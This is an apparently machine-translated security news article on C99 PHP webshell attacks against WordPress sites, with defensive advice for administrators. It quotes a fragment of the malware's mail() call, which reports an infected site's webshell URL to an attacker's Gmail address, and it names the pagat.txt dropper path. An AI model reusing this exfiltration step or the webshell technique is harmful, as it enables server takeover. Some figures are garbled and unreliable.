C99phpwebshell attacks are intensifying, and a large number of WordPress sites are under threat.

C99phpwebshell attacks are intensifying, and a large number of WordPress sites are under threat. recently, the IBM management Security Service (MSS) team issued a warning that it has been monitored through exploitation C99 php webshell,Large WordPressThe website has suffered a new attack, reminding the WordPress site administrator to promptly scan and fix site vulnerabilities.

It is reported that, based on the long-term monitoring and analysis of malicious events by the ibm mss team, security researchers have found that in the past two months, traffic exceptions caused by a class C99 webshell have occurred, among them, 404 incidents were detected in March, and 588 incidents were detected in March, as shown below,

We know that through Webshell, malicious files can be uploaded to the Web server or commands can be passed to the server for execution. It can be written in multiple programming languages. from PHP to ASP. NET, from JavaScript to Ruby, attackers can control the server, while c99 webshell is often used by attackers.

Pagat.txt file

The ibm mss Security team said that attackers often exploit the security vulnerabilities of site plug-ins to infect them through C99 webshell. In the initial infection stage, the webshell script was uploaded to the server and stored on the server as a text file. according to research, it is found that the file name is usually pagat.txt. In this file, IBM Security researchers also found the PHP source code for obfuscation. the code snippet is as follows,

To make the code more obscure and make it more difficult to detect the infected behavior, attackers did not place the above text files in the root directory of the server or in the directory folder of the plug-in. In the big data case, the pagat.txt file is generally stored in the following path.

“http://www.website-name.com/wp-content/themes/twentythirteen/pagat.txt”

We can also check our WordPress website server based on this path to see if there are any suspicious files.

Attack steps

Attackers can find a path to transmit text content to the PHP interpreter on the server. After malicious code is executed, the following operations are generally performed,

First, an email is sent to the attacker to inform the attacker of the specific location of the infected site. This email is sent to a Gmail address, which contains the domain name of the web site and the URL of webshell.

mail(“XXXXX@gmail.com“, “$body”, “Hasil Bajakan hxxp://$web$inj

Then, create a form page under the site directory using the code contained in the pagat.txt file, as shown below,

Finally, attackers can access the newly created form file through a browser, and then pass commands or upload files to the server. the access page is as follows,

As shown in, Webshell allows attackers to run terminal commands on the server or upload new files to the site. new files can be more invasive webshells and DDoS clients, bitcoin miner software or other malware.

According to the ibm mss team, as of, only Google's search engine was used to find that approximately wordpresspoints contained the pagat.txt file.

Security suggestions

Based on the current situation, it is recommended that the site administrator perform the following operations,

1. edit the php. ini file and disable base64 decoding. In the php. ini file, find the related configuration statement "disable_functions =" and set this statement to "disable_functions = eval, base64_decode, gzinflate ";

2. change the name of the upload folder. WordPress allows you to write files to the upload folder through the upload program. if you still use the default name, attackers can easily guess the specific path of the file to be uploaded, this greatly reduces the cost of uploading php files containing shell scripts;

3. install a highly available security plug-in, such as the wordfence WordPress plug-in;

4. perform security scanning. We recommend that you use an open-source scanning tool to scan all uploaded files. here, you can use the scan tool Modsecurity. at the same time, you can use the AWVS or WordPress security scanner to scan the site to detect vulnerabilities in time, and carry out repair and reinforcement;

5. if the website has been infected, it is recommended that you change the password of all the management accounts of the site in time and notify the site user to change the password.

* Reference source: Softpedia, Securityintelligence, and FB editor troy. For more information, see FreeBuf hacker and geek (FreeBuf. COM)